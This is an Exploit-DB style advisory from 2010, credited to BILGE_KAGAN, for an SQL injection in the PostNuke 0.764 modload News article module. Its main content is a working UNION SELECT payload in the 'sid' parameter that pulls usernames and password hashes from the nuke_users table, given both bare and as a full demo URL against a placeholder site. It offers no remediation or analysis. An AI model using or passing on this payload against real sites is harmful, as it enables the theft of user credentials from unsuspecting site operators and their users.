PostNuke 0.764 Module modload - SQL Injection

EDB-ID:

12410




Platform:

PHP

Date:

2010-04-26


PostNuke 0.764 Module modload SQL Injection Vulnerability

###########################  
      
Author    : BILGE_KAGAN
   
Homepage  : http://www.1923turk.com   
      
Script    : postnuke http://www.postnuke.com 
  
Download  : http://www.postnuke.com/module-Content-view-pid-2.html  
      
###########################    
        
[ Vulnerable File ]
  
    
modules.php?op=modload&name=News&file=article&sid=[ SQL ]  
         
    
[ XpL ] 
 
      
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- 
  
[ Demo] 
 
  
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--